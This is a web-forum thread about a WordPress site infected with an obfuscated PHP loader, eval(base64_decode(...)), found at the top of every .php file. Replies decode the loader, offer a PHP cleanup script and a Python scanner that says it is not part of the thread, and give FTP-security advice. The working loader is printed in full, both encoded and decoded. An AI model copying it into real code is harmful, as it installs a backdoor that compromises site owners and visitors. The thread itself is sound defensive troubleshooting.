
Hacker Php code

cantstop

Anyone know what this is supposed to do? Some hacker has been placing it at the top of every file ending in .php in my blogs and sites.
PHP:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2Vuam95YS9wdWJsaWNfaHRtbC9hbm5hbmljb2xlbGVnZW5kL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvdGhlbWVzL2FkdmFuY2VkL2ltYWdlcy94cC9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>
The views expressed on this page by users and staff are their own, not those of NamePros.
Anyone know what this is supposed to do? Some hacker has been placing it at the top of every file ending in .php in my blogs and sites.
PHP:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2Vuam95YS9wdWJsaWNfaHRtbC9hbm5hbmljb2xlbGVnZW5kL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvdGhlbWVzL2FkdmFuY2VkL2ltYWdlcy94cC9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>

Well it decoded is:
PHP:
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn']))
{
$GLOBALS['mfsn']='/home/enjoya/public_html/annanicolelegend/wp-includes/js/tinymce/themes/advanced/images/xp/style.css.php';
if(file_exists($GLOBALS['mfsn']))
{
include_once($GLOBALS['mfsn']);
if(function_exists('gml')&&function_exists('dgobh'))
{
ob_start('dgobh');
}
}
}
So it looks as though he's put malicious code in /home/enjoya/public_html/annanicolelegend/wp-includes/js/tinymce/themes/advanced/images/xp/style.css.php, which I would advise removing straight away (show us what it is before you delete it :) ).
The script looks to see if it's included and, if not, includes it. Then it starts its own output buffering; looks like it wants to steal user stuff.
Thank you for the response. I have been removing it, but it is quite time consuming as there are 100s of files containing .php in a single WP blog. Whoever put these worked cheap, because they put the code in every alternate theme as well as every plug-in file, or does this propagate itself after being placed in the blog? I have seen mostly the hacking where 1000s of pharma links are placed in the footer, but this is placed in every area of the script. I don't get what value user information is from a blog.
Thank you for the response. I have been removing it, but it is quite time consuming as there are 100s of files containing .php in a single WP blog. Whoever put these worked cheap, because they put the code in every alternate theme as well as every plug-in file, or does this propagate itself after being placed in the blog? I have seen mostly the hacking where 1000s of pharma links are placed in the footer, but this is placed in every area of the script. I don't get what value user information is from a blog.

I can't say exactly what it does unless you could tell me what's in wp-includes/js/tinymce/themes/advanced/images/xp/style.css.php. They've got a recursive script that inserts it into the top of every PHP file, which they've presumably run and got rid of.
You could always try to run a mass find/replace on that code using software such as Dreamweaver or Notepad++, which both support find/replace within folders.

Also, have you installed any suspicious/uncommon plugins recently that may have vulnerabilities? It seems that you're using WordPress, and as far as I know, WP is decent at security.

Also, change all your passwords once you remove all the malicious code, just in case the hackers got your password too or something.
billy the exterminator

There were no new plugins. If this was just placed in one file and it replicated itself, or if someone got a work order "place this code in every file named .php", because it is even in all the unused test themes. I wish I knew if there were some files that it could stay in without hurting anything so I can prioritize. nasaboy007, I like that idea; I found out by accident that Notepad has that feature last month, but how would you do that in cPanel? Or would you download the files to your PC, then edit and reupload? Seems you will still have to open the files one by one; that is what takes all the time.
There were no new plugins. If this was just placed in one file and it replicated itself, or if someone got a work order "place this code in every file named .php", because it is even in all the unused test themes. I wish I knew if there were some files that it could stay in without hurting anything so I can prioritize. nasaboy007, I like that idea; I found out by accident that Notepad has that feature last month, but how would you do that in cPanel? Or would you download the files to your PC, then edit and reupload? Seems you will still have to open the files one by one; that is what takes all the time.

I've written you a special script to use; it will do a mass search/replace for the content and will try to delete it if it's there. If not, it'll tell you it couldn't open the file for writing but it found nasty stuff there. Basically, paste the code below into a file, name it whatever you want, e.g. cleaner.php, upload it to your site into the public_html folder and run it from your browser.

NOTE: It may take some time running as it's checking every file in your site. Make a backup of everything as is (the script shouldn't muck anything up, but as always, just in case).
PHP:
<?php
//Recursive Directory Search and Replace - (Beaver6813) Beaver6813.com
//Adapted from recursive directory listing by hotrungdungit at gmail dot com at php.net
set_time_limit(900);
function SearchandReplace($dir,$stringsearch)
{
    // htmlspecialchars() so the "<?php ..." search string is visible in the browser instead of being swallowed as a tag
    echo "<strong>Starting search for ".htmlspecialchars($stringsearch)." within directory $dir</strong><br/><br/>";
    $listDir = array();
    if($handler = opendir($dir)) {
        while (($sub = readdir($handler)) !== FALSE) {
            if ($sub != "." && $sub != ".." && $sub != "Thumb.db") {
                if(is_file($dir."/".$sub)) {
                    // Only look inside files whose name contains ".php"
                    if(substr_count($sub,'.php'))
                    {
                        $getfilecontents = file_get_contents($dir."/".$sub);
                        if(substr_count($getfilecontents,$stringsearch)>0)
                        {
                            // Strip every copy of the injected line and leave the rest of the file as it was
                            $replacer = str_replace($stringsearch,'',$getfilecontents);
                            // Let's make sure the file exists and is writable first.
                            if (is_writable($dir."/".$sub)) {
                                if (!$handle = fopen($dir."/".$sub, 'w')) {
                                    echo "Cannot open file (".$dir."/".$sub.")";
                                    exit;
                                }
                                // Write the cleaned contents back to our opened file.
                                if (fwrite($handle, $replacer) === FALSE) {
                                    echo "Cannot write to file (".$dir."/".$sub.")";
                                    exit;
                                }
                                echo "Success, removed searched content from: ".$dir."/".$sub."<br/>";
                                fclose($handle);
                            } else {
                                echo "The file ".$dir."/".$sub." is not writable<br/>";
                            }
                        }
                    }
                    $listDir[] = $sub;
                }elseif(is_dir($dir."/".$sub)){
                    // Recurse into subdirectories
                    $listDir[$sub] = SearchandReplace($dir."/".$sub,$stringsearch);
                }
            }
        }
        closedir($handler);
    }
    return $listDir;
}

SearchandReplace('/home/enjoya/public_html/',"<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2Vuam95YS9wdWJsaWNfaHRtbC9hbm5hbmljb2xlbGVnZW5kL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvdGhlbWVzL2FkdmFuY2VkL2ltYWdlcy94cC9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>");
?>

Good luck! :wave:
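Beaver decoded the loader by hand and then removed it by exact-string match, which misses any copy whose base64 text differs (the encoded string embeds the site's own path to the dropper). As an added example that is not part of this thread, the scanner below matches the loader's shape instead, decodes each copy to report which dropper file it points at, and strips it; LOADER_RE, MFSN_RE and the sample file are my assumptions built from the decoded code above, and the sample's dropper path is a placeholder.

```python
import base64
import re
import tempfile
from pathlib import Path

# The thread's one-line loader: eval() of a base64 string with optional /**/ padding.
LOADER_RE = re.compile(
    r"<\?php\s*(?:/\*\*/)?\s*eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\);\s*\?>")
MFSN_RE = re.compile(r"\$GLOBALS\['mfsn'\]\s*=\s*'([^']+)'")  # dropper path in the decoded payload

def decode_loader(php_source):
    """Return (decoded_payload, dropper_path) for the first loader found, else None."""
    m = LOADER_RE.search(php_source)
    if m is None:
        return None
    payload = base64.b64decode(m.group(1)).decode("utf-8", errors="replace")
    path = MFSN_RE.search(payload)
    return payload, (path.group(1) if path else None)

def strip_loader(php_source):
    # Remove every loader occurrence; returns (cleaned_source, removed_count)
    return LOADER_RE.subn("", php_source)

def scan_tree(root, fix=False):
    """Map each infected .php file under root to its dropper path; rewrite it if fix=True."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        text = path.read_text(encoding="utf-8", errors="replace")
        result = decode_loader(text)
        if result is not None:
            findings[str(path.relative_to(root))] = result[1]
            if fix:
                path.write_text(strip_loader(text)[0], encoding="utf-8")
    return findings

# Constructed sample in the thread's loader shape; the dropper path is a placeholder.
SAMPLE_PAYLOAD = ("if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){"
    "$GLOBALS['mfsn']='/home/example/public_html/wp-includes/js/tinymce/x.css.php';"
    "if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);"
    "if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}")
CLEAN_FILE = "<?php\n// legitimate theme code\necho 'hello';\n"
INFECTED_FILE = ("<?php /**/eval(base64_decode('" + base64.b64encode(
    SAMPLE_PAYLOAD.encode()).decode() + "')); ?>" + CLEAN_FILE)

def demo():
    """Write one infected file into a temp tree, scan it with fix=True, return the results."""
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "header.php").write_text(INFECTED_FILE, encoding="utf-8")
        return scan_tree(tmp, fix=True), (Path(tmp) / "header.php").read_text(encoding="utf-8")
```

Run it with `fix=False` first to get the list of infected files and dropper paths, and only then with `fix=True` on a backed-up tree.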
If you have Dreamweaver, you can connect via FTP and do the search/replace remotely (without downloading files). If you have too many files, Beaver's script may still time out.
If you have Dreamweaver, you can connect via FTP and do the search/replace remotely (without downloading files). If you have too many files, Beaver's script may still time out.

Dreamweaver will still have to download each file to check the contents; it will be automated, but it'll still have to download and check every file.
Hi,

IMO, it is likely that your FTP username/password has been compromised. I've seen many similar attacks on sites hosted on my servers. You could ask your web host to check their logs to see whether this is indeed the case.

The two main causes of the compromise are:

1. Malicious code running on your PC which reads FTP usernames/passwords stored by your FTP software (perhaps in the registry).

2. FTP usernames/passwords are normally sent in the clear. They could have been sniffed if you used an insecure network connection, such as an unencrypted wireless network.

You should fix the root cause of the problem first. Run a virus scan on all PCs you have used to connect to your site via FTP. Use a secure authentication mechanism, as described in Secure FTP.

Once you've identified and fixed the root cause, you should restore your site. Since you don't know what has been compromised, I suggest asking your host to delete and recreate your account with a new password, then restore your site from a backup taken before the account was compromised.